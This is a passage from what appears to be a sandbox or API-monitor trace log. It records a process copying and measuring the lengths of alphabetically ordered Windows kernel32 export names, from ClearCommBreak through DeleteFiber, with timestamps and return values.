lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0048.253] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0048.253] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0048.253] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0048.253] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0048.253] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0048.253] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0048.253] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0048.253] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0048.253] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0048.253] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0048.253] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0048.253] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0048.253] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0048.253] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0048.253] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0048.253] lstrcpyA (in: lpString1=0x355eba0, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0048.253] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0048.255] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0048.255] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0048.255] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0048.255] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0048.255] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0048.255] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0048.255] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0048.255] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0048.255] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0048.255] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0048.255] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0048.255] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0048.255] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0048.255] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0048.255] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0048.255] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0048.256] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0048.256] lstrlenA (lpString="COPYCONTEXT") returned 11 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0048.256] lstrlenA (lpString="COPYFILEA") returned 9 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0048.256] lstrlenA (lpString="COPYFILEEXA") returned 11 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0048.256] lstrlenA (lpString="COPYFILEEXW") returned 11 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0048.256] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0048.256] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0048.256] lstrlenA (lpString="COPYFILEW") returned 9 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0048.256] lstrlenA (lpString="COPYLZFILE") returned 10 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0048.256] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0048.256] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0048.256] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0048.256] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0048.256] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0048.256] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0048.256] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0048.256] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0048.257] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0048.257] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0048.257] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0048.257] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0048.257] lstrlenA (lpString="CREATEEVENTA") returned 12 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0048.257] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0048.257] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0048.257] lstrlenA (lpString="CREATEEVENTW") returned 12 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0048.257] lstrlenA (lpString="CREATEFIBER") returned 11 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0048.257] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0048.257] lstrlenA (lpString="CREATEFILEA") returned 11 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0048.257] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0048.257] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0048.257] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0048.257] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0048.257] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0048.257] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0048.257] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0048.258] lstrlenA (lpString="CREATEFILEW") returned 11 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0048.258] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0048.258] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0048.258] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0048.258] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0048.258] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0048.258] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0048.258] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0048.258] lstrlenA (lpString="CREATEJOBSET") returned 12 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0048.258] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0048.258] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0048.258] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0048.258] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0048.258] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0048.258] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0048.258] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0048.258] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0048.258] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0048.259] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0048.259] lstrlenA (lpString="CREATEPIPE") returned 10 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0048.259] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0048.259] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0048.259] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0048.259] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0048.259] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0048.259] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0048.259] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0048.259] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0048.259] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0048.259] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0048.259] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0048.259] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0048.259] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0048.259] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0048.259] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0048.259] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0048.259] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0048.260] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0048.260] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0048.260] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0048.260] lstrlenA (lpString="CREATETHREAD") returned 12 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0048.260] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0048.260] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0048.260] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0048.260] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0048.260] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0048.260] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0048.260] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0048.260] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0048.260] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0048.260] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0048.260] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0048.260] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0048.260] lstrcpyA (in: lpString1=0x355eba0, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0048.260] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0048.261] lstrlenA (lpString="CTRLROUTINE") returned 11 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0048.261] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0048.261] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0048.261] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0048.261] lstrlenA (lpString="DEBUGBREAK") returned 10 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0048.261] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0048.261] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0048.261] lstrlenA (lpString="DECODEPOINTER") returned 13 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0048.261] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0048.261] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0048.261] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0048.261] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0048.261] lstrlenA (lpString="DELETEATOM") returned 10 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0048.261] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0048.261] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0048.261] lstrlenA (lpString="DELETEFIBER") returned 